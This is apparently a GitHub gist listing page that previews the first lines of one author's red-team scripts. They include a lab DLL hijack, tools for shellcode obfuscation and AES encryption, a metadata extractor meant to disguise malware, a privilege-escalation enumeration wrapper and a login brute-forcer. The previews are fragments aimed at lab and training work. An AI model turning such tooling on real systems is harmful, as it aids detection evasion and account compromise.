Caue B caueb
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Vulnlab: Bruno | |
| // DLL Hijack of hostfxr.dll | |
| #include <winsock2.h> | |
| #include <stdio.h> | |
| #define _CRT_SECURE_NO_DEPRECATE | |
| #pragma warning (disable : 4996) | |
| #pragma comment(lib, "ws2_32") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ipaddress import ip_address | |
| import sys | |
| if len(sys.argv) < 2: | |
| print("Usage: %s <shellcode_file>" % sys.argv[0]) | |
| sys.exit(1) | |
| with open(sys.argv[1], "rb") as f: | |
| chunk = f.read(4) | |
| ip_addresses = [] |
caueb
/ getbinmetadata.ps1
Last active
August 16, 2023 07:03
Extract binary metadata. Useful to spoof binary metadata in malware development.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: .\getbinmetadata.ps1 -File 7-zip.exe | |
| param( | |
| [Parameter(Mandatory = $true)] | |
| [ValidateScript({Test-Path $_ -PathType Leaf})] | |
| [string]$File | |
| ) | |
| # Retrieve basic properties | |
| $fileProperties = Get-ItemProperty -Path $File |
caueb
/ getdllfunctions.py
Last active
September 20, 2023 01:22
Get all functions of a DLL file. Useful to build DLL proxy projects.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Install dependencies | |
| # pip install pefile | |
| import pefile | |
| import optparse | |
| import os | |
| def test(path): | |
| if os.path.exists(path) == False: | |
| print("[-] File Not Found: {}".format(path)) |
caueb
/ bintoaes.py
Created
July 14, 2023 08:59
AES encrypt binary and save the encrypted shellcode to a file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| from base64 import b64encode | |
| from Crypto.Cipher import AES | |
| from Crypto.Util.Padding import pad | |
| from Crypto.Random import get_random_bytes | |
| import hashlib | |
| KEY = get_random_bytes(16) | |
| iv = 16 * b'\x00' | |
| cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| # Check if file argument is provided | |
| if len(sys.argv) != 2: | |
| print("Usage: python shellcode.py <shellcode_file>") | |
| sys.exit(1) | |
| shellcode_file = sys.argv[1] | |
| try: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| # Check if file argument is provided | |
| if len(sys.argv) != 2: | |
| print("Usage: python shellcode_to_hex.py <shellcode_file>") | |
| sys.exit(1) | |
| shellcode_file = sys.argv[1] | |
| try: |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-winPEAS | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $true)] | |
| [ValidateNotNullorEmpty()] | |
| [String] | |
| $Command | |
| ) |
caueb
/ login_brute.py
Created
February 16, 2022 23:39
Basic login bruteforce using a provided wordlist.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import requests | |
| target_url = "http://10.10.10.240/login.php" | |
| data_dict = "{"username": "admin", "password": "", "Login": "submit"}" | |
| with open("/home/kali/Desktop/passwords.txt", "r") as wordlist_file: | |
| for line in wordlist_file: | |
| word = line.strip() |
caueb
/ gen_usernames.py
Last active
May 17, 2024 06:54
Generate a list of usernames making different combinations from Name + Lastname.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| import os.path | |
| import argparse | |
| def generate_usernames(fname, lname, domain): | |
| usernames = [ | |
| f"{fname}{lname}@{domain}", # johndoe@domain.com | |
| f"{lname}{fname}@{domain}", # doejohn@domain.com | |
| f"{fname}.{lname}@{domain}", # john.doe@domain.com |